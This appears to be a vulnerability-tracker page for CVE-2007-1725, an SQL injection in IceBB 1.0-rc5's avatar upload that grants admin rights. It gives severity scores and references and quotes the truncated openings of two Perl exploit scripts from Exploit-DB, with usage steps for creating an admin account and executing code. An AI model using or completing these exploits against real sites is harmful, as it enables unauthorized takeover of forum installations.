CVE-2007-1725
published 2007-03-28CVE-2007-1725: SQL injection vulnerability in index.php in IceBB 1.0-rc5 allows remote authenticated users to execute arbitrary SQL commands via the filename of an uploaded…
PriorityP339critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
1.80%
75.8th percentile
SQL injection vulnerability in index.php in IceBB 1.0-rc5 allows remote authenticated users to execute arbitrary SQL commands via the filename of an uploaded file to the avatar function, as demonstrated by setting admin privileges.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| icebb | icebb | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IceBB 1.0-rc5 - Remote Create Admin
exploitdb·2007-03-26
CVE-2007-1725 IceBB 1.0-rc5 - Remote Create Admin
IceBB 1.0-rc5 - Remote Create Admin
---
#!/usr/bin/perl
# IceBB 1.0-rc5 Remote Create Admin Exploit
# 1. register a user
# 2. run this exploit with this usage : $perl xpl.pl [host&path] [uname] [pass]
# 3. login with admin access :)
# - magic_quotes_gpc = Off
#
#### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net
use LWP::UserAgent;
use HTTP::Cookies;
$port = "80";
$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
print q(
###########################################################
# IceBB 1.0-rc5 Remote Create Admin Exploit #
# www.Hessamx.Net #
################# (C)oded By Hessam-x #####################
);
if (@ARGV new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$login = $xpl->post($url.'index.php',
Con
Exploit-DB
IceBB 1.0-rc5 - Remote Code Execution
exploitdb·2007-03-26
CVE-2007-1726 IceBB 1.0-rc5 - Remote Code Execution
IceBB 1.0-rc5 - Remote Code Execution
---
#!/usr/bin/perl
# IceBB 1.0-rc5 Remote Code Execution Exploit
# 1. register a user
# 2. run this exploit with this usage : $perl xpl.pl [host&path] [uname] [pass]
# 3. login with admin access :)
#
#
#### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net
use LWP::UserAgent;
use HTTP::Cookies;
$port = "80";
$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
print q(
###########################################################
# IceBB 1.0-rc5 Remote Code Exec Exploit #
# www.Hessamx.Net #
################# (C)oded By Hessam-x #####################
);
if (@ARGV new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$login = $xpl->post($url.'index.php',
Content => [
'act' => 'logi
No writeups or analysis indexed.
http://osvdb.org/34497http://secunia.com/advisories/24644http://www.securityfocus.com/bid/23158http://www.vupen.com/english/advisories/2007/1116https://exchange.xforce.ibmcloud.com/vulnerabilities/33240https://www.exploit-db.com/exploits/3580https://www.exploit-db.com/exploits/3581http://osvdb.org/34497http://secunia.com/advisories/24644http://www.securityfocus.com/bid/23158http://www.vupen.com/english/advisories/2007/1116https://exchange.xforce.ibmcloud.com/vulnerabilities/33240https://www.exploit-db.com/exploits/3580https://www.exploit-db.com/exploits/3581
2007-03-28
Published